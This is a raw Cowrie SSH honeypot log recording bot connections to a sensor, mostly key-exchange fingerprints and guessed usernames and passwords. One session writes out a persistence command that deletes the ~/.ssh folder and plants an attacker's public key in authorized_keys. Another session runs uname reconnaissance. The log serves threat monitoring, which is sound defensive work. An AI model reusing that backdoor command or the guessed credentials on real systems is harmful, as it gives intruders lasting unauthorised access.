{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:05.914811Z","src_ip":"212.227.125.160","session":"8f12578ff876"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"administrator","message":"login attempt [administrator/administrator] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:06.070276Z","src_ip":"212.227.125.160","session":"8f12578ff876"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:07.122555Z","src_ip":"212.227.125.160","session":"8f12578ff876"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36954,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac1e84f5cf21","protocol":"ssh","message":"New connection: 212.227.125.160:36954 (1.2.3.4:22) [session: ac1e84f5cf21]","sensor":"my-vps","timestamp":"2025-08-26T11:56:11.276969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:11.278642Z","src_ip":"212.227.125.160","session":"ac1e84f5cf21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:11.331888Z","src_ip":"212.227.125.160","session":"ac1e84f5cf21"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:11.489436Z","src_ip":"212.227.125.160","session":"ac1e84f5cf21"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:12.547418Z","src_ip":"212.227.125.160","session":"ac1e84f5cf21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43518,"dst_ip":"1.2.3.4","dst_port":22,"session":"54f976ac7d8a","protocol":"ssh","message":"New connection: 212.227.235.229:43518 (1.2.3.4:22) [session: 54f976ac7d8a]","sensor":"my-vps","timestamp":"2025-08-26T11:56:14.447131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:56:14.447944Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:56:14.645343Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.login.success","username":"root","password":"12341qaz","message":"login attempt [root/12341qaz] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:56:15.481371Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:56:15.949305Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:56:15.950127Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:56:15.951409Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.149365Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:56:16.600895Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.601732Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37722,"dst_ip":"1.2.3.4","dst_port":22,"session":"114d50dd912f","protocol":"ssh","message":"New connection: 212.227.125.160:37722 (1.2.3.4:22) [session: 114d50dd912f]","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.707853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.709154Z","src_ip":"212.227.125.160","session":"114d50dd912f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.771938Z","src_ip":"212.227.125.160","session":"114d50dd912f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.799543Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.801097Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.978899Z","src_ip":"212.227.125.160","session":"114d50dd912f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43522,"dst_ip":"1.2.3.4","dst_port":22,"session":"df610b52964b","protocol":"ssh","message":"New connection: 212.227.235.229:43522 (1.2.3.4:22) [session: df610b52964b]","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.995641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:56:16.996223Z","src_ip":"212.227.235.229","session":"df610b52964b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:56:17.191992Z","src_ip":"212.227.235.229","session":"df610b52964b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:18.017469Z","src_ip":"212.227.235.229","session":"df610b52964b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:18.065550Z","src_ip":"212.227.125.160","session":"114d50dd912f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48684,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b4f996aa340","protocol":"ssh","message":"New connection: 83.168.105.65:48684 (1.2.3.4:22) [session: 3b4f996aa340]","sensor":"my-vps","timestamp":"2025-08-26T11:56:18.237417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:18.238643Z","src_ip":"83.168.105.65","session":"3b4f996aa340"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:18.278018Z","src_ip":"83.168.105.65","session":"3b4f996aa340"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:18.397574Z","src_ip":"83.168.105.65","session":"3b4f996aa340"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:19.216791Z","src_ip":"212.227.235.229","session":"df610b52964b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43534,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea494f1a79ce","protocol":"ssh","message":"New connection: 212.227.235.229:43534 (1.2.3.4:22) [session: ea494f1a79ce]","sensor":"my-vps","timestamp":"2025-08-26T11:56:19.412246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:56:19.413699Z","src_ip":"212.227.235.229","session":"ea494f1a79ce"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:19.438192Z","src_ip":"83.168.105.65","session":"3b4f996aa340"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:56:19.610073Z","src_ip":"212.227.235.229","session":"ea494f1a79ce"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:56:20.473392Z","src_ip":"212.227.235.229","session":"ea494f1a79ce"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:20.671681Z","src_ip":"212.227.235.229","session":"ea494f1a79ce"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:20.672606Z","src_ip":"212.227.235.229","session":"54f976ac7d8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38490,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee580f8ba588","protocol":"ssh","message":"New connection: 212.227.125.160:38490 (1.2.3.4:22) [session: ee580f8ba588]","sensor":"my-vps","timestamp":"2025-08-26T11:56:22.649607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:22.650590Z","src_ip":"212.227.125.160","session":"ee580f8ba588"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:22.702382Z","src_ip":"212.227.125.160","session":"ee580f8ba588"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:56:22.861699Z","src_ip":"212.227.125.160","session":"ee580f8ba588"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:56:22.992495Z","src_ip":"212.227.125.160","session":"ee580f8ba588"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:56:22.993176Z","src_ip":"212.227.125.160","session":"ee580f8ba588"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:23.045759Z","src_ip":"212.227.125.160","session":"ee580f8ba588"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:23.046763Z","src_ip":"212.227.125.160","session":"ee580f8ba588"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39258,"dst_ip":"1.2.3.4","dst_port":22,"session":"71c11d9d4189","protocol":"ssh","message":"New connection: 212.227.125.160:39258 (1.2.3.4:22) [session: 71c11d9d4189]","sensor":"my-vps","timestamp":"2025-08-26T11:56:28.008173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:28.008845Z","src_ip":"212.227.125.160","session":"71c11d9d4189"}
